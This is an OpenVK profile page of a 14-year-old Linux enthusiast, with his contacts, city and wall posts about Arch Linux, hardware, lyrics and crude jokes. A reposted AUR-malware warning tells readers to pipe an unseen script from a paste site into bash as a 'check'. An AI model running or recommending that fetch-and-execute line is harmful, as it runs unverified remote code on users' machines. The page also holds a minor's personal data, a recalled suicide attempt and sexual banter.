Закрыть
Роман Ломакин
был в сети вчера в 22:43

Роман (Kandase) Ломакин

продал душу дьяволу
Местоимения: он/его
Семейное положение: Помолвлен с Артемий Неверлузов
Дата регистрации: 22 октября 2022 в 09:35
Полит. взгляды: Не выбраны
День рождения: 10 августа 2011, 14 лет
Информация

Контактная информация

Telegram: @kandasechannel
Личный сайт: https://kandase.gt.tc
Город: Санкт-Петербург
GitHub: https://github.com/milinate
Telegram (личные сообщения): https://t.me/cheesecake1337

Личная информация

Интересы: Программирование, блогинг, борьба за правду в сообществе GNU/Linux
Любимая музыка: Tree Palm, Waterflame, Noize MC, lia;quo, Camellia, BeeHunter
Любимые ТВ-шоу: телек харам
Любимые цитаты: "нахуй пошел" - Enderman
Любимые игры: Geometry Dash, CS:GO, GTA SA:MP
Мое ведро: Atermiter X79G E5-2690v2 16GB (8x2) DDR3 1866 CL9 GTX 1660 Super 6GB Patriot P300 512GB (ALT Regular XFCE4 + Windows 10 LTSC 21H2) WD Blue 1TB
Gacha: Club
О себе: =========================== Привет! Добро пожаловать ко мне на страницу в OpenVK, в интернете позиционирую себя как яростным хейтером Arch Linux и производных, а также создателем своего дистрибутива Milinate System. =========================== Если ваш друг/подруга увлекается не здоровым хобби как "Arch Linux" или "CachyOS" напишите мне в Telegram -> https://t.me/cheesecake1337 -> перевоспитаю :3 =========================== Принимаю в друзьях всех, много лайкаю, могу с любым пообщаться на ITшные темы. =========================== Правила публикаций на моей стене (за нарушение ЧС): - Скриншоты с fetch-like программами на Arch Linux и его производных. - Порнография, расчлененка, такое могу у себя на стену публиковать только я :) - Щитпосты можно, но не выходящие за рамки здравого смысла. =========================== Остальные мои социальные сети закреплены выше, приятного обывания в сети Интернет! ===========================
Подарки
12 подарков
Стена 233 записи Все
Doggie сдох на уровне GRIEF на 97% из-за мода Click Between Frames, памянем
Пожаловаться  |  Комментарии (1)  |  Поделиться
Странно, но зато красиво.
жиза
D.WIGHT Right Towards You
05:30
I’m moving right towards you
And I’m feeling pretty stupid
Doesn’t matter if the sun is coming our way
I’m moving right towards you
And I’m feeling pretty stupid

They say that love is untrue
But my shoes kept running
Is it easy to be down, or am I just sad?
They say that love is untrue
But my shoes kept running

Slowly we build to undo
Where the ground keeps holding
In our castle made of sand, we’re choosing to stay
Slowly we build to undo
Where the ground keeps holding

A few meters on the side
You’re out of line
Separate
Bring together
Ideas circling without fuel
Motions drilling without rules
We’re against
We’re just doing nothing
We’re just doing nothing
We’re one and turned into none.
Пожаловаться  |  Комментарии (1)  |  Поделиться
У меня лично бывает такое редко, что прямо порнография снится, потому что в основном в снах у меня черный экран :D
Я пошла спать, а точнее смотреть порнуху. Мои сны работают как порно сайт с хардкор садомазо бдсмом.
Пожаловаться  |  Комментарии (2)  |  Поделиться
А зачем о будущем думать, если будущего уже нету? Да и "думать о будущем" это реально тупая формулировка, потому что если человек не следит за своими действиями, то он может провалится в думании о будущем, при этом он забудет те проблемы которые у него сейчас, сегодня, в этот момент, равно также как и с ностальгией.
в 10 лет после попытки в окно спрыгнуть, думала, мол, до 16 не доживу, нет смысла че либо планировать...
вот посмотрите теперь где я, 16 летняя дура, которая не знает че как дальше. ребята, следите за своей менталкой и думайте о своем будущем.
Пожаловаться  |  Комментарии  |  Поделиться (1)
Присоединюсь, но если кто-то еще будет в эту ветку кидать fetch'и я буду лично им выдавать им по ебалу.

Сначала у меня вообще был HP Pavilion G6, но я не помню какая точно модель, вроде 1250er, где был серебряный корпус и Pentium B950 без дискретной графики.

Позже ASUS K551LN на i5 4210U и NVIDIA 840m, с которым я проходил уже года 4.

И в конца июля прошлого года у меня появился компьютер, полноценный, изначально его конфигурация была это E5-2640v2 + GTX 750 Ti, и этого мне на удивление хватало, но как захотелось ведра пошустрее собирать и в монтаже видео развиваться я в течении полугода насиловал все что вижу и перетыркивал что есть пока это не пришло к тому, чему я имею по сей день...
Показать больше
У меня долгое время был HP 650 с Intel Celeron B830, 2 ГБ ОЗУ (был апгрейд до 6 Гб) и 500Гб ЖДшка.
Потом мне после поступления в колледж, мне подарили Anus Zenbook с Ryzen 3500U и 8 Гб ОЗУ.
С 8-ью гигами жить очень больно (особенно под десяткой), поэтому я собрал себе компутер, который недавно был почти полностью пересобран.
- Intel i3 12100f (был заменён на i5 13400f)
- AMD Radeon RX 6500XT (заменён на невижу ГыФорс 4060)
- 16 Гигов ОЗУ (дополнил до 32 гигов, жир лютый)
- 500, 1ТБ ССД нвмешки и 4 тб ЖДшка

Крч, для меня лютый жир, но в будущем думаю ноут заменить, т.к. даже с лабами для уника ноуту очень тяжко с Visual Studio и пр. дерьмом, а в будущем вроде как ещё и Android Studio будут обучать.

Нахуя я это написал?
Показать больше
Вообщем, у меня уж не свезло так с железом. Я по сути комп свой таки получил в наследство от матери (да да она мертва гыгыгыгы), изначально там стоял i5-550, какая то нн оператива 2гб, gt 8800, та же мать h55m-le, ну и трухлявый корпус, ну и 750GB МАТЬ ЕГО WESTERN DIGITAL BLACK - он отслужил мне ЕБАНЫХ 14 ЛЕТ В РЕАЛТАЙМЕ и до сих пор лежит у меня на полочке. Я видеокарты обновлял как перчатки, и вот они слева на право
GT 8800 - GTS 210 (512mb) - Radeon HD 5550 (1gb) - Radeon HD 5750 (1gb) - Radeon HD 7770 (кент временно подогнал пока не куплю новую) - RX 550 (2gb). Остальные видеокарточки я уже не помню честно говоря. ибо они горели постоянно.

комп таки был нехуйным в то время. ну уж особенно по меркам 2009 года. А с тех пор менялся БП с DNP 500 на DNP 550, проц на зевон 3460, ну и озушка как и корпус на AeroCool Cylon Mini. Это были больше полумеры - чтобы хоть как то ПК вывозил свои задачи с 2009 года по 2026 (и до сих пор вполне справляется)

материнка кстати мною чуток ремонтировалась как и блок питания. На материнке наебнулись все задние порты поскольку вышел из строя какой то из резисторов пришлось паять перемычку. А в БП пришлось несколько раз менять что в старом что в новом конденсаторы (незабываемый опыт пайки в узких пространствах). Ну еще рыгсу прогревал недавно пробовал, не особо помогло
Показать больше
Пожаловаться  |  Комментарии  |  Поделиться (1)
(делаю вид как будто я эту новость вижу впервые)

Ура! Молодцы кто льют в помойку помои, я скажу честно, этот рассадник снобизма уже давно надо уничтожить, это тот самый дистрибутив Linux который показывает - что та архитектура системы которая она имеет ее просто невозможно доработать для самого обычного человека, она слишком модульна, например банально инициализацией, API библиотеки, это все держится на сторонних утилитах и из-за этого обновляя частями систему вероятность что-то сломать увеличивается быстрее арифметической прогрессии, особенно на заранее нестабильные компоненты (Rolling Release, альцгеймер все же лечим).

Это как с домом, самые обычные дома для нормальных людей - снизу закопанный землей фундамент, сверху уже самый обычный, комфортный, уютный, пусть как у всех, но обычный дом где можно обустраивать быт и.. я не придумал. (Windows, MacOS)

Но в Linux этот фундамент мало того что он на клее и честном слове, так еще и не закопан под землей, просто недоделан, так этим еще и хвастаются даже больше чем самим домом сверху.

Поэтому я считаю что лучше всего и по итогу просто переустроить весь концепт десктопного Linux так такого, и это и сделает его более привлекательным, чем рассказы о том, "какой Arch крутой", я по этому поводу все сказал.
Показать больше
❗️Малварь в AUR

Народ, в AUR последние пару дней раздают заразу. Сотни пакетов — не один, не два, а реально много, в том числе те, что ставят обычные люди. Воровать умеет SSH-ключи, логины из браузеров, возможно, цепляет руткит.

Если что-то ставили или обновляли из AUR за последние дни — проверьтесь:

"curl -s https://cscs.pastes.sh/raw/aurvulntest20260611.sh | bash"

Заражённый пакет сносится через sudo pacman -Rdd имя_пакета.

Пока полной картины нет, но вывод простой: AUR сейчас не трогаем, пока не разберутся. Честно говоря, это хорошее напоминание, что AUR всегда был зоной «сам себе режиссёр».

Ссылки для тех, кто хочет копнуть глубже:
• Обсуждение на списке рассылки: https://lists.archlinux.org/archives/list/[email protected]/thread/FGXPCB3ZVCJIV7FX323SBAX2JHYB7ZS4/
• Предварительный разбор: https://ioctl.fail/preliminary-analysis-of-aur-malware/
• Скрипт проверки: https://gist.github.com/Kidev/59bf9f5fb53ab5eee99f19a6a2fc3992

Берегите свои машины.

https://t.me/os_world_channel
Показать больше
Автор: Артём Добрый
Пожаловаться  |  Комментарии (2)  |  Поделиться
« 6 7 8 9 10 »